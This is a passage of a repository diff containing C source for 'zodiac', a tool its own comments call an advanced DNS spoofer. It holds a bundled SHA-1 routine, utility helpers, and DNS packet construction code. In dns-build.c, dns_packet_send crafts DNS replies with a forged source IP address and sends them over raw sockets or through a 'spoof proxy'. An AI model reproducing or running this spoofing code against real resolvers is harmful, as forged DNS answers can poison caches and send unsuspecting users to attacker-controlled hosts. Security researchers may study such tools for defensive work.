* return a pointer to a new allocated decrypted data block
*/
unsigned char *bf_decipher (char *keyphrase, unsigned char *data,
size_t data_len);
#endif

View file

@ -0,0 +1,202 @@
/* sha-1 implementation
*
* by steve reid <steve@edmweb.com>
* modified by scut
*/
/* #define LITTLE_ENDIAN * This should be #define'd if true. */
#include <stdio.h>
#include <string.h>
#include "cipher-sha1.h"
typedef struct {
unsigned long state[5];
unsigned long count[2];
unsigned char buffer[64];
} SHA1_CTX;
static void SHA1Transform (unsigned long state[5],
unsigned char buffer[64]);
static void SHA1Init (SHA1_CTX* context);
static void SHA1Update (SHA1_CTX* context, unsigned char* data,
unsigned int len);
static void SHA1Final (unsigned char digest[20], SHA1_CTX* context);
#define rol(value, bits) (((value) << (bits)) | ((value) >> (32 - (bits))))
/* blk0() and blk() perform the initial expand. */
/* I got the idea of expanding during the round function from SSLeay */
#ifdef LITTLE_ENDIAN
#define blk0(i) (block->l[i] = (rol(block->l[i],24)&0xFF00FF00) \
|(rol(block->l[i],8)&0x00FF00FF))
#else
#define blk0(i) block->l[i]
#endif
#define blk(i) (block->l[i&15] = rol(block->l[(i+13)&15]^block->l[(i+8)&15] \
^block->l[(i+2)&15]^block->l[i&15],1))
/* (R0+R1), R2, R3, R4 are the different operations used in SHA1 */
#define R0(v,w,x,y,z,i) z+=((w&(x^y))^y)+blk0(i)+0x5A827999+rol(v,5),w=rol(w,30);
#define R1(v,w,x,y,z,i) z+=((w&(x^y))^y)+blk(i)+0x5A827999+rol(v,5),w=rol(w,30);
#define R2(v,w,x,y,z,i) z+=(w^x^y)+blk(i)+0x6ED9EBA1+rol(v,5),w=rol(w,30);
#define R3(v,w,x,y,z,i) z+=(((w|x)&y)|(w&x))+blk(i)+0x8F1BBCDC+rol(v,5),w=rol(w,30);
#define R4(v,w,x,y,z,i) z+=(w^x^y)+blk(i)+0xCA62C1D6+rol(v,5),w=rol(w,30);
/* Hash a single 512-bit block. This is the core of the algorithm. */
void
SHA1Transform (unsigned long state[5], unsigned char buffer[64])
{
unsigned long a, b, c, d, e;
typedef union {
unsigned char c[64];
unsigned long l[16];
} CHAR64LONG16;
CHAR64LONG16 *block;
static unsigned char workspace[64];
block = (CHAR64LONG16 *) workspace;
memcpy (block, buffer, 64);
/* Copy context->state[] to working vars */
a = state[0];
b = state[1];
c = state[2];
d = state[3];
e = state[4];
/* 4 rounds of 20 operations each. Loop unrolled. */
R0(a,b,c,d,e, 0); R0(e,a,b,c,d, 1); R0(d,e,a,b,c, 2); R0(c,d,e,a,b, 3);
R0(b,c,d,e,a, 4); R0(a,b,c,d,e, 5); R0(e,a,b,c,d, 6); R0(d,e,a,b,c, 7);
R0(c,d,e,a,b, 8); R0(b,c,d,e,a, 9); R0(a,b,c,d,e,10); R0(e,a,b,c,d,11);
R0(d,e,a,b,c,12); R0(c,d,e,a,b,13); R0(b,c,d,e,a,14); R0(a,b,c,d,e,15);
R1(e,a,b,c,d,16); R1(d,e,a,b,c,17); R1(c,d,e,a,b,18); R1(b,c,d,e,a,19);
R2(a,b,c,d,e,20); R2(e,a,b,c,d,21); R2(d,e,a,b,c,22); R2(c,d,e,a,b,23);
R2(b,c,d,e,a,24); R2(a,b,c,d,e,25); R2(e,a,b,c,d,26); R2(d,e,a,b,c,27);
R2(c,d,e,a,b,28); R2(b,c,d,e,a,29); R2(a,b,c,d,e,30); R2(e,a,b,c,d,31);
R2(d,e,a,b,c,32); R2(c,d,e,a,b,33); R2(b,c,d,e,a,34); R2(a,b,c,d,e,35);
R2(e,a,b,c,d,36); R2(d,e,a,b,c,37); R2(c,d,e,a,b,38); R2(b,c,d,e,a,39);
R3(a,b,c,d,e,40); R3(e,a,b,c,d,41); R3(d,e,a,b,c,42); R3(c,d,e,a,b,43);
R3(b,c,d,e,a,44); R3(a,b,c,d,e,45); R3(e,a,b,c,d,46); R3(d,e,a,b,c,47);
R3(c,d,e,a,b,48); R3(b,c,d,e,a,49); R3(a,b,c,d,e,50); R3(e,a,b,c,d,51);
R3(d,e,a,b,c,52); R3(c,d,e,a,b,53); R3(b,c,d,e,a,54); R3(a,b,c,d,e,55);
R3(e,a,b,c,d,56); R3(d,e,a,b,c,57); R3(c,d,e,a,b,58); R3(b,c,d,e,a,59);
R4(a,b,c,d,e,60); R4(e,a,b,c,d,61); R4(d,e,a,b,c,62); R4(c,d,e,a,b,63);
R4(b,c,d,e,a,64); R4(a,b,c,d,e,65); R4(e,a,b,c,d,66); R4(d,e,a,b,c,67);
R4(c,d,e,a,b,68); R4(b,c,d,e,a,69); R4(a,b,c,d,e,70); R4(e,a,b,c,d,71);
R4(d,e,a,b,c,72); R4(c,d,e,a,b,73); R4(b,c,d,e,a,74); R4(a,b,c,d,e,75);
R4(e,a,b,c,d,76); R4(d,e,a,b,c,77); R4(c,d,e,a,b,78); R4(b,c,d,e,a,79);
/* Add the working vars back into context.state[] */
state[0] += a;
state[1] += b;
state[2] += c;
state[3] += d;
state[4] += e;
/* Wipe variables */
a = b = c = d = e = 0;
return;
}
/* SHA1Init - Initialize new context */
void
SHA1Init (SHA1_CTX *context)
{
/* SHA1 initialization constants */
context->state[0] = 0x67452301;
context->state[1] = 0xEFCDAB89;
context->state[2] = 0x98BADCFE;
context->state[3] = 0x10325476;
context->state[4] = 0xC3D2E1F0;
context->count[0] = context->count[1] = 0;
return;
}
/* Run your data through this. */
void
SHA1Update (SHA1_CTX* context, unsigned char* data, unsigned int len)
{
unsigned int i, j;
j = (context->count[0] >> 3) & 63;
if ((context->count[0] += len << 3) < (len << 3))
context->count[1]++;
context->count[1] += (len >> 29);
if ((j + len) > 63) {
memcpy (&context->buffer[j], data, (i = 64-j));
SHA1Transform (context->state, context->buffer);
for ( ; i + 63 < len ; i += 64) {
SHA1Transform (context->state, &data[i]);
}
j = 0;
} else
i = 0;
memcpy (&context->buffer[j], &data[i], len - i);
return;
}
/* Add padding and return the message digest. */
void
SHA1Final (unsigned char digest[20], SHA1_CTX* context)
{
unsigned long i, j;
unsigned char finalcount[8];
for (i = 0 ; i < 8 ; i++) {
finalcount[i] = (unsigned char)((context->count[(i >= 4 ? 0 : 1)] >> ((3-(i & 3)) * 8) ) & 255);
}
SHA1Update (context, (unsigned char *)"\200", 1);
while ((context->count[0] & 504) != 448) {
SHA1Update (context, (unsigned char *)"\0", 1);
}
/* Should cause a SHA1Transform() */
SHA1Update (context, finalcount, 8);
for (i = 0 ; i < 20 ; i++) {
digest[i] = (unsigned char) ((context->state[i>>2] >> ((3-(i & 3)) * 8) ) & 255);
}
/* Wipe variables */
i = j = 0;
memset (context->buffer, 0, 64);
memset (context->state, 0, 20);
memset (context->count, 0, 8);
memset (&finalcount, 0, 8);
SHA1Transform (context->state, context->buffer);
return;
}
void
SHA1Hash (char *password, unsigned char *hash)
{
SHA1_CTX context;
SHA1Init (&context);
SHA1Update (&context, password, strlen (password));
SHA1Final (hash, &context);
return;
}

View file

@ -0,0 +1,24 @@
/* sha-1 implementation
*
* by steve reid <steve@edmweb.com>
* modified by scut
*
* include file
*/
#ifndef _FNX_CIPHER_SHA1_H
#define _FNX_CIPHER_SHA1_H
/* SHA1Hash
*
* hash an ASCIIZ password into a 20 byte long hash byte buffer
*
* return in any case
*/
void SHA1Hash (char *password, unsigned char *hash);
#endif

318
dns/zodiac/src/common.c Normal file
View file

@ -0,0 +1,318 @@
#include <sys/time.h>
#include <netinet/in.h>
#include <time.h>
#include <stdarg.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include "common.h"
#ifdef DEBUG
void
debugp (char *filename, const char *str, ...)
{
FILE *fp; /* temporary file pointer */
va_list vl;
fp = fopen (filename, "a");
if (fp == NULL)
return;
va_start (vl, str);
vfprintf (fp, str, vl);
va_end (vl);
fclose (fp);
return;
}
void
hexdump (char *filename, unsigned char *data, unsigned int amount)
{
FILE *fp; /* temporary file pointer */
unsigned int dp, p; /* data pointer */
const char trans[] =
"................................ !\"#$%&'()*+,-./0123456789"
":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
"nopqrstuvwxyz{|}~...................................."
"....................................................."
"........................................";
fp = fopen (filename, "a");
if (fp == NULL)
return;
fprintf (fp, "\n-packet-\n");
for (dp = 1; dp <= amount; dp++) {
fprintf (fp, "%02x ", data[dp-1]);
if ((dp % 8) == 0)
fprintf (fp, " ");
if ((dp % 16) == 0) {
fprintf (fp, "| ");
p = dp;
for (dp -= 16; dp < p; dp++)
fprintf (fp, "%c", trans[data[dp]]);
fflush (fp);
fprintf (fp, "\n");
}
fflush (fp);
}
if ((amount % 16) != 0) {
p = dp = 16 - (amount % 16);
for (dp = p; dp > 0; dp--) {
fprintf (fp, " ");
if (((dp % 8) == 0) && (p != 8))
fprintf (fp, " ");
fflush (fp);
}
fprintf (fp, " | ");
for (dp = (amount - (16 - p)); dp < amount; dp++)
fprintf (fp, "%c", trans[data[dp]]);
fflush (fp);
}
fprintf (fp, "\n");
fclose (fp);
return;
}
#endif
/* m_random
*
* return a random number between `lowmark' and `highmark'
*/
int
m_random (int lowmark, int highmark)
{
long int rnd;
/* flip/swap them in case user messed up
*/
if (lowmark > highmark) {
lowmark ^= highmark;
highmark ^= lowmark;
lowmark ^= highmark;
}
rnd = lowmark;
rnd += (random () % (highmark - lowmark));
/* this is lame, i know :)
*/
return (rnd);
}
/* set_tv
*
* initializes a struct timeval pointed to by `tv' to a second value of
* `seconds'
*
* return in any case
*/
void
set_tv (struct timeval *tv, int seconds)
{
tv->tv_sec = seconds;
tv->tv_usec = 0;
return;
}
/* xstrupper
*
* uppercase a string `str'
*
* return in any case
*/
void
xstrupper (char *str)
{
for (; *str != '\0'; ++str) {
if (*str >= 'a' && *str <= 'z') {
*str -= ('a' - 'A');
}
}
return;
}
/* concating snprintf
*
* determines the length of the string pointed to by `os', appending formatted
* string to a maximium length of `len'.
*
*/
void
scnprintf (char *os, size_t len, const char *str, ...)
{
va_list vl;
char *ostmp = os + strlen (os);
va_start (vl, str);
vsnprintf (ostmp, len - strlen (os) - 1, str, vl);
va_end (vl);
return;
}
unsigned long int
tdiff (struct timeval *old, struct timeval *new)
{
unsigned long int time1;
if (new->tv_sec >= old->tv_sec) {
time1 = new->tv_sec - old->tv_sec;
if ((new->tv_usec - 500000) >= old->tv_usec)
time1++;
} else {
time1 = old->tv_sec - new->tv_sec;
if ((old->tv_usec - 500000) >= new->tv_usec)
time1++;
}
return (time1);
}
/* ipv4_print
*
* padding = 0 -> don't padd
* padding = 1 -> padd with zeros
* padding = 2 -> padd with spaces
*/
char *
ipv4_print (char *dest, struct in_addr in, int padding)
{
unsigned char *ipp;
ipp = (unsigned char *) &in.s_addr;
strcpy (dest, "");
switch (padding) {
case (0):
sprintf (dest, "%d.%d.%d.%d", ipp[0], ipp[1], ipp[2], ipp[3]);
break;
case (1):
sprintf (dest, "%03d.%03d.%03d.%03d", ipp[0], ipp[1], ipp[2], ipp[3]);
break;
case (2):
sprintf (dest, "%3d.%3d.%3d.%3d", ipp[0], ipp[1], ipp[2], ipp[3]);
break;
default:
break;
}
return (dest);
}
void *
xrealloc (void *m_ptr, size_t newsize)
{
void *n_ptr;
n_ptr = realloc (m_ptr, newsize);
if (n_ptr == NULL) {
fprintf (stderr, "realloc failed\n");
exit (EXIT_FAILURE);
}
return (n_ptr);
}
char *
xstrdup (char *str)
{
char *b;
b = strdup (str);
if (b == NULL) {
fprintf (stderr, "strdup failed\n");
exit (EXIT_FAILURE);
}
return (b);
}
void *
xcalloc (int factor, size_t size)
{
void *bla;
bla = calloc (factor, size);
if (bla == NULL) {
fprintf (stderr, "no memory left\n");
exit (EXIT_FAILURE);
}
return (bla);
}
/* source by dk
*/
char *
allocncat (char **to, char *from, size_t len)
{
int rlen = strlen (from);
int null = *to == NULL;
len = rlen < len ? rlen : len;
*to = realloc (*to, (null ? 0 : strlen (*to)) + len + 1);
if (null)
**to = '\0';
if (*to == NULL)
perror ("no memory: ");
return (strncat (*to, from, len));
}
char *
alloccat (char **to, char *from)
{
return (allocncat (to, from, strlen (from)));
}
char *
ip_get_random (void)
{
char *ip = xcalloc (1, 17);
int i[4];
for (;;) {
i[0] = m_random (1, 239);
if (i[0] != 10 && i[0] != 127 && i[0] != 192)
break;
}
i[1] = m_random (1, 254);
i[2] = m_random (1, 254);
i[3] = m_random (1, 254);
sprintf (ip, "%d.%d.%d.%d", i[0], i[1], i[2], i[3]);
return (ip);
}

26
dns/zodiac/src/common.h Normal file
View file

@ -0,0 +1,26 @@
#ifndef Z_COMMON_H
#define Z_COMMON_H
#include <sys/time.h>
#include <netinet/in.h>
#ifdef DEBUG
void debugp (char *filename, const char *str, ...);
void hexdump (char *filename, unsigned char *data, unsigned int amount);
#endif
int m_random (int lowmark, int highmark);
void set_tv (struct timeval *tv, int seconds);
void xstrupper (char *str);
void scnprintf (char *os, size_t len, const char *str, ...);
unsigned long int tdiff (struct timeval *old, struct timeval *new);
char *ipv4_print (char *dest, struct in_addr in, int padding);
void *xrealloc (void *m_ptr, size_t newsize);
char *xstrdup (char *str);
void *xcalloc (int factor, size_t size);
char *allocncat (char **to, char *from, size_t len);
char *alloccat (char **to, char *from);
char *ip_get_random (void);
#endif

670
dns/zodiac/src/dns-build.c Normal file
View file

@ -0,0 +1,670 @@
/* zodiac - advanced dns spoofer
*
* dns packet construction routines
* if you need some, just borrow here and drop me a line of credit :)
*
* by scut / teso
*/
#include <libnet.h> /* route's owning library =) */
#include <arpa/nameser.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <string.h>
#include "common.h"
#include "dns.h"
#include "dns-build.h"
#include "dns-tag.h"
#include "io-udp.h"
#include "network.h"
#include "zodiac.h"
extern char * match_hash;
/* dns_build_random
*
* prequel the domain name `domain' with a random sequence of characters
* with a random length if len is zero, or a fixed length if len is != 0
*
* return the allocated new string
*/
char *
dns_build_random (char *domain, size_t len)
{
int dlen, cc;
char *pr;
cc = dlen = (len == 0) ? m_random (3, 16) : len;
pr = xcalloc (1, strlen (domain) + dlen + 2);
for (; dlen > 0; --dlen) {
char p;
(int) p = m_random ((int) 'a', (int) 'z');
pr[dlen - 1] = p;
}
pr[cc] = '.';
memcpy (pr + cc + 1, domain, strlen (domain));
return (pr);
}
/* dns_domain
*
* return a pointer to the beginning of the SLD within a full qualified
* domain name `domainname'.
*
* return NULL on failure
* return a pointer to the beginning of the SLD on success
*/
char *
dns_domain (char *domainname)
{
char *last_label = NULL,
*hold_label = NULL;
if (domainname == NULL)
return (NULL);
/* find last SLD
*/
for (; *domainname != '\x00'; ++domainname) {
if (*domainname == '.') {
last_label = hold_label;
hold_label = domainname + 1;
}
}
return (last_label);
}
/*
* gets the domain of an in-addr.arpa string.
* 123.123.123.123.in-addr.arpa ==> 123.123.123.in-addr.arpa
* return a pointer inside arpaname on success
* return NULL on failure
*/
char *
dns_ptr_domain (char *arpaname)
{
char *dot;
if (strstr (arpaname, "in-addr.arpa") == NULL)
return (NULL);
if (atoi (arpaname) == 0)
return (NULL);
dot = strchr (arpaname, '.');
return ((dot == NULL) ? NULL : (dot + 1));
}
/* dns_build_new
*
* constructor. create new packet data body
*
* return packet data structure pointer (initialized)
*/
dns_pdata *
dns_build_new (void)
{
dns_pdata *new;
new = xcalloc (1, sizeof (dns_pdata));
new->p_offset = NULL;
new->p_data = NULL;
return (new);
}
/* dns_build_destroy
*
* destructor. destroy a dns_pdata structure pointed to by `pd'
*
* return in any case
*/
void
dns_build_destroy (dns_pdata *pd)
{
if (pd == NULL)
return;
if (pd->p_data != NULL)
free (pd->p_data);
free (pd);
return;
}
/* dns_build_plen
*
* calculate the length of the current packet data body pointed to by `pd'.
*
* return the packet length
*/
u_short
dns_build_plen (dns_pdata *pd)
{
if (pd == NULL)
return (0);
if (pd->p_data == NULL || pd->p_offset == NULL)
return (0);
return ((u_short) (pd->p_offset - pd->p_data));
}
/* dns_build_extend
*
* extend a dns_pdata structure data part for `amount' bytes.
*
* return a pointer to the beginning of the extension
*/
unsigned char *
dns_build_extend (dns_pdata *pd, size_t amount)
{
unsigned int u_ptr = dns_build_plen (pd);
/* realloc is your friend =)
*/
pd->p_data = realloc (pd->p_data, u_ptr + amount);
if (pd->p_data == NULL) {
exit (EXIT_FAILURE);
}
/* since realloc can move the memory we have to calculate
* p_offset completely from scratch
*/
pd->p_offset = pd->p_data + u_ptr + amount;
return (pd->p_data + u_ptr);
}
/* dns_build_ptr
*
* take a numeric quad dot notated ip address `ip_str' and build a char
* domain out of it within the IN-ADDR.ARPA domain.
*
* return NULL on failure
* return a char pointer to the converted domain name
*/
char *
dns_build_ptr (char *ip_str)
{
char *ip_ptr;
int dec[4];
int n;
if (ip_str == NULL)
return (NULL);
/* kludge for functions that already pass a reversed string
*/
if (strstr (ip_str, "in-addr.arpa"))
return (xstrdup (ip_str));
/* parse ip string, on failure drop conversion
*/
n = sscanf (ip_str, "%d.%d.%d.%d", &dec[0], &dec[1], &dec[2], &dec[3]);
if (n != 4)
return (NULL);
/* allocate a new string of the required length
*/
ip_ptr = xcalloc (1, strlen (ip_str) + strlen (".in-addr.arpa") + 1);
sprintf (ip_ptr, "%d.%d.%d.%d.in-addr.arpa", dec[3], dec[2], dec[1], dec[0]);
return (ip_ptr);
}
/* dns_build_q
*
* append a query record into a dns_pdata structure, where `dname' is the
* domain name that should be queried, using `qtype' and `qclass' as types.
*
* conversion of the `dname' takes place according to the value of `qtype':
*
* qtype | expected dname format | converted to
* ---------+-----------------------+-----------------------------------------
* T_PTR | char *, ip address | IN-ADDR.ARPA dns domain name
* T_A | char *, full hostname | dns domain name
* T_NS | " | "
* T_CNAME | " | "
* T_SOA | " | "
* T_WKS | " | "
* T_HINFO | " | "
* T_MINFO | " | "
* T_MX | " | "
* T_ANY | " | "
*
* return (beside adding the record) the pointer to the record within the data
*/
unsigned char *
dns_build_q (dns_pdata *pd, char *dname, u_short qtype, u_short qclass)
{
unsigned char *qdomain = NULL;
unsigned char *tgt, *rp;
int dlen;
switch (qtype) {
case (T_PTR):
/* convert in itself, then convert to a dns domain
*/
dname = dns_build_ptr (dname);
if (dname == NULL)
return (NULL);
case (T_A):
case (T_NS):
case (T_CNAME):
case (T_SOA):
case (T_WKS):
case (T_HINFO):
case (T_MINFO):
case (T_MX):
case (T_TXT):
case (T_ANY):
/* convert to a dns domain
*/
dlen = dns_build_domain (&qdomain, dname);
if (dlen == 0)
return (NULL);
break;
default:
return (NULL);
}
tgt = rp = dns_build_extend (pd, dlen + sizeof (qtype) + sizeof (qclass));
memcpy (tgt, qdomain, dlen);
tgt += dlen;
free (qdomain);
PUTSHORT (qtype, tgt);
PUTSHORT (qclass, tgt);
return (rp);
}
/* dns_build_rr
*
* append a resource record into a dns_pdata structure, pointed ty by `pd',
* where `dname' is the domain name the record belongs to, `type' and `class'
* are the type and class of the dns data part, `ttl' is the time to live,
* the time in seconds how long to cache the record. `rdlength' is the length
* of the resource data pointed to by `rdata'.
* depending on `type' the data at `rdata' will be converted to the appropiate
* type:
*
* type | rdata points to | will be
* -------+---------------------+---------------------------------------------
* T_A | char IP address | 4 byte network byte ordered IP address
* T_PTR | char domain name | encoded dns domain name
* T_NS | char domain name | encoded dns domain name
*
* return (beside adding the record) the pointer to the record within the data
*/
unsigned char *
dns_build_rr (dns_pdata *pd, unsigned char *dname, u_short type, u_short class,
u_long ttl, void *rdata)
{
char *ptr_ptr = NULL;
struct in_addr ip_addr; /* temporary, to convert */
unsigned char *qdomain = NULL;
unsigned char *tgt, *rp = NULL;
u_short rdlength = 0;
unsigned char *rdata_converted; /* converted rdata */
int n;
switch (type) {
case (T_A):
/* resolve the quad dotted IP address, then copy it into the
* rdata array
*/
ip_addr.s_addr = net_resolve ((char *) rdata);
rdata_converted = xcalloc (1, sizeof (struct in_addr));
memcpy (rdata_converted, &ip_addr.s_addr, sizeof (struct in_addr));
rdlength = 4;
break;
case (T_NS):
case (T_CNAME):
case (T_PTR):
/* build a dns domain from the plaintext domain name
*/
n = dns_build_domain ((unsigned char **) &rdata_converted, (char *) rdata);
if (n == 0)
return (NULL);
rdlength = n;
break;
case (T_TXT):
rdata_converted = xstrdup (rdata);
rdlength = strlen (rdata_converted);
break;
default:
return (NULL);
}
/* create a real dns domain from the plaintext query domain
*/
switch (type) {
case (T_PTR):
ptr_ptr = dns_build_ptr (dname);
dname = ptr_ptr;
default:
n = dns_build_domain (&qdomain, dname);
if (n == 0)
goto rr_fail;
break;
}
if (ptr_ptr != NULL)
free (ptr_ptr);
/* extend the existing dns packet to hold our extra rr record
*/
tgt = rp = dns_build_extend (pd, dns_labellen (qdomain) + sizeof (type) +
sizeof (class) + sizeof (ttl) + sizeof (rdlength) + rdlength);
memcpy (tgt, qdomain, dns_labellen (qdomain));
tgt += dns_labellen (qdomain);
free (qdomain);
PUTSHORT (type, tgt);
PUTSHORT (class, tgt);
PUTLONG (ttl, tgt);
PUTSHORT (rdlength, tgt);
memcpy (tgt, rdata_converted, rdlength);
tgt += rdlength;
rr_fail:
free (rdata_converted);
return (rp);
}
/* dns_build_query_label
*
* build a query label given from the data `query' that should be enclosed
* and the query type `qtype' and query class `qclass'.
* the label is passed back in printable form, not in label-length form.
*
* qtype qclass query
* -----------+---------------+-----------------------------------------------
* A IN pointer to a host- or domainname
* PTR IN pointer to a struct in_addr
*
* ... (to be extended) ...
*
* return 0 on success
* return 1 on failure
*/
int
dns_build_query_label (unsigned char **query_dst, u_short qtype, u_short qclass, void *query)
{
char label[256];
struct in_addr *ip;
/* we do only internet queries (qclass is just for completeness)
* also drop empty queries
*/
if (qclass != C_IN || query == NULL)
return (1);
switch (qtype) {
case (T_A): *query_dst = xstrdup (query);
break;
case (T_PTR): memset (label, '\0', sizeof (label));
ip = (struct in_addr *) query;
net_printipr (ip, label, sizeof (label) - 1);
scnprintf (label, sizeof (label), ".in-addr.arpa");
*query_dst = xstrdup (label);
break;
default: return (1);
break;
}
return (0);
}
/* dns_build_domain
*
* build a dns domain label sequence out of a printable domain name
* store the resulting domain in `denc', get the printable domain
* from `domain'.
*
* return 0 on failure
* return length of the created domain (include suffixing '\x00')
*/
int
dns_build_domain (unsigned char **denc, char *domain)
{
char *start = domain,
*out,
c = '\0';
int n = strlen (domain);
if (n > MAXDNAME)
return (0);
out = *denc = xcalloc (1, n + 2);
domain += n - 1;
out += n + 1;
*out-- = 0;
n = 0;
while (domain >= start) {
c = *domain--;
if (c == '.') {
*out-- = n;
n = 0;
} else {
*out-- = c;
n++;
}
}
if (n != '\0')
*out-- = n;
return (strlen (out + 1) + 1);
}
/* deprecated, old version
int
dns_build_domain (unsigned char **denc, char *domain)
{
char *b, *dst;
if (strlen (domain) >= 255)
return (0);
dst = *denc = xcalloc (1, strlen (domain) + 2);
*dst = (unsigned char) dns_build_domain_dotlen (domain);
dst++;
for (b = domain ; *b != '\x00' ; ++b) {
if (*b == '.') {
*dst = (unsigned char) dns_build_domain_dotlen (b + 1);
} else {
*dst = *b;
}
++dst;
}
*dst = '\x00';
dst += 1;
return ((unsigned long int) ((unsigned long) dst - (unsigned long) *denc));
}
*/
/* dns_build_domain_dotlen
*
* helper routine, determine the length of the next label in a human
* printed domain name
*
* return the number of characters until an occurance of \x00 or '.'
*/
int
dns_build_domain_dotlen (char *label)
{
int n;
/* determine length
*/
for (n = 0; *label != '.' && *label != '\x00'; n++, ++label)
;
return (n);
}
/* dns_packet_send
*
* send a prepared dns packet spoofing from `ip_src' to `ip_dst', using
* source port `prt_src' and destination port `prt_dst'. the dns header
* data is filled with `dns_id', the dns identification number of the
* packet, `flags', which are the 16bit flags in the dns header, then
* four count variables, each for a dns segment: `count_q' is the number
* of queries, `count_a' the number of answers, `count_ns' the number of
* nameserver entries and `count_ad' the number of additional entries.
* the real dns data is aquired from `dbuf', `dbuf_s' bytes in length.
* the dns data should be constructed using the dns_build_* functions.
* if the packet should be compressed before sending it, `compress'
* should be set to 1.
*
* return 0 on success
* return 1 on failure
*/
int
dns_packet_send (char *ip_src, char *ip_dst, u_short prt_src, u_short prt_dst,
u_short dns_id, u_short flags, u_short count_q, u_short count_a,
u_short count_ns, u_short count_ad, dns_pdata *pd, int compress)
{
int sock; /* raw socket, yeah :) */
int n; /* temporary return value */
unsigned char buf[4096]; /* final packet buffer */
unsigned char *dbuf = pd->p_data;
size_t dbuf_s = dns_build_plen (pd);
struct in_addr s_addr,
d_addr;
s_addr.s_addr = net_resolve (ip_src);
d_addr.s_addr = net_resolve (ip_dst);
libnet_build_dns ( dns_id, /* dns id (the famous one, 'antilove'd by many users ;) */
flags, /* standard query response */
count_q, /* count for query */
count_a, /* count for answer */
count_ns, /* count for authoritative information */
count_ad, /* count for additional information */
dbuf, /* buffer with the queries/rr's */
dbuf_s, /* query size */
buf + IP_H + UDP_H); /* write into packet buffer */
libnet_build_udp ( prt_src, /* source port */
prt_dst, /* 53 usually */
NULL, /* content already there */
DNS_H + dbuf_s, /* same */
buf + IP_H); /* build after ip header */
libnet_build_ip ( UDP_H + DNS_H + dbuf_s, /* content size */
0, /* tos */
libnet_get_prand (PRu16), /* id :) btw, what does 242 mean ? */
0, /* frag */
64, /* ttl */
IPPROTO_UDP, /* subprotocol */
s_addr.s_addr, /* spoofa ;) */
d_addr.s_addr, /* local dns querier */
NULL, /* payload already there */
0, /* same */
buf); /* build in packet buffer */
libnet_do_checksum (buf, IPPROTO_UDP, UDP_H + DNS_H + dbuf_s);
libnet_do_checksum (buf, IPPROTO_IP, IP_H);
/* check whether we have to send out our putty through a spoof proxy :-]
*/
if (zodiac_spoof_proxy == NULL) {
/* mark packet so we don't fucking catch our own packets =-)
*/
dns_tag_add (ip_src, ip_dst, prt_src, prt_dst, dns_id);
sock = libnet_open_raw_sock(IPPROTO_RAW);
if (sock == -1)
return (1);
n = libnet_write_ip (sock, buf, UDP_H + IP_H + DNS_H + dbuf_s);
if (n < UDP_H + IP_H + DNS_H + dbuf_s) {
return (1);
}
close (sock);
} else {
socklen_t p_len = UDP_H + IP_H + DNS_H + dbuf_s;
unsigned char *p_buf;
/* set matching hash
*/
p_buf = xcalloc (1, p_len + 16);
memcpy (p_buf + 16, buf, p_len);
memcpy (p_buf, match_hash, 16);
p_len += 16;
udp_write (zodiac_spoof_proxy, zodiac_spoof_proxy_port, p_buf,
p_len, zodiac_spoof_proxy_key);
free (p_buf);
}
return (0);
}

212
dns/zodiac/src/dns-build.h Normal file
View file

@ -0,0 +1,212 @@
/* zodiac - advanced dns spoofer
*
* dns packet builder routines include file
*
* by scut / teso
*/
#ifndef Z_DNS_BUILD_H
#define Z_DNS_BUILD_H
/* dns_pdata
*
* domain name service packet data part structure.
* the data in this structure is the virtual dns packet to fire.
*/
typedef struct dns_pdata {
unsigned char *p_offset; /* internal offset to construct packet data */
unsigned char *p_data; /* real packet data pointer */
} dns_pdata;
/* dns_build_random
*
* prequel the domain name `domain' with a random sequence of characters
* with a random length if `len' is zero, and a fixed length if len is != 0
*
* return the allocated new string
*/
char *dns_build_random (char *domain, size_t len);
/* dns_domain
*
* return a pointer to the beginning of the SLD within a full qualified
* domain name `domainname'.
*
* return NULL on failure
* return a pointer to the beginning of the SLD on success
*/
char *dns_domain (char *domainname);
char *dns_ptr_domain (char *arpaname);
/* dns_build_new
*
* constructor. create new packet data body
*
* return packet data structure pointer (initialized)
*/
dns_pdata *dns_build_new (void);
/* dns_build_destroy
*
* destructor. destroy a dns_pdata structure pointed to by `pd'
*
* return in any case
*/
void dns_build_destroy (dns_pdata *pd);
/* dns_build_plen
*
* calculate the length of the current packet data body pointed to by `pd'.
*
* return the packet length
*/
u_short dns_build_plen (dns_pdata *pd);
/* dns_build_extend
*
* extend a dns_pdata structure data part for `amount' bytes.
*
* return a pointer to the beginning of the extension
*/
unsigned char *dns_build_extend (dns_pdata *pd, size_t amount);
/* dns_build_ptr
*
* take a numeric quad dot notated ip address `ip_str' and build a char
* domain out of it within the IN-ADDR.ARPA domain.
*
* return NULL on failure
* return a char pointer to the converted domain name
*/
char *dns_build_ptr (char *ip_str);
/* dns_build_q
*
* append a query record into a dns_pdata structure, where `dname' is the
* domain name that should be queried, using `qtype' and `qclass' as types.
*
* conversion of the `dname' takes place according to the value of `qtype':
*
* qtype | expected dname format | converted to
* ---------+-----------------------+-----------------------------------------
* TY_PTR | char *, ip address | IN-ADDR.ARPA dns domain name
* TY_A | char *, full hostname | dns domain name
* TY_NS | " | "
* TY_CNAME | " | "
* TY_WKS | " | "
* TY_HINFO | " | "
* TY_MINFO | " | "
* TY_MX | " | "
*
* return (beside adding the record) the pointer to the record within the data
*/
unsigned char *dns_build_q (dns_pdata *pd, char *dname, u_short qtype, u_short qclass);
/* dns_build_rr
*
* append a resource record into a dns_pdata structure, pointed ty by `pd',
* where `dname' is the domain name the record belongs to, `type' and `class'
* are the type and class of the dns data part, `ttl' is the time to live,
* the time in seconds how long to cache the record. `rdlength' is the length
* of the resource data pointed to by `rdata'.
* depending on `type' the data at `rdata' will be converted to the appropiate
* type:
*
* type | rdata points to | will be
* -------+---------------------+---------------------------------------------
* TY_A | char IP address | 4 byte network byte ordered IP address
* TY_PTR | char domain name | encoded dns domain name
* TY_NS | char domain name | encoded dns domain name
*
* return (beside adding the record) the pointer to the record within the data
*/
unsigned char *dns_build_rr (dns_pdata *pd, unsigned char *dname,
u_short type, u_short class, u_long ttl, void *rdata);
/* dns_build_query_label
*
* build a query label given from the data `query' that should be enclosed
* and the query type `qtype' and query class `qclass'.
*
* qtype qclass query
* -----------+---------------+-----------------------------------------------
* A IN pointer to a host- or domainname
* PTR IN pointer to a struct in_addr
*
* ... (to be extended) ...
*
* return 0 on success
* return 1 on failure
*/
int dns_build_query_label (unsigned char **query_dst, u_short qtype, u_short qclass, void *query);
/* dns_build_domain
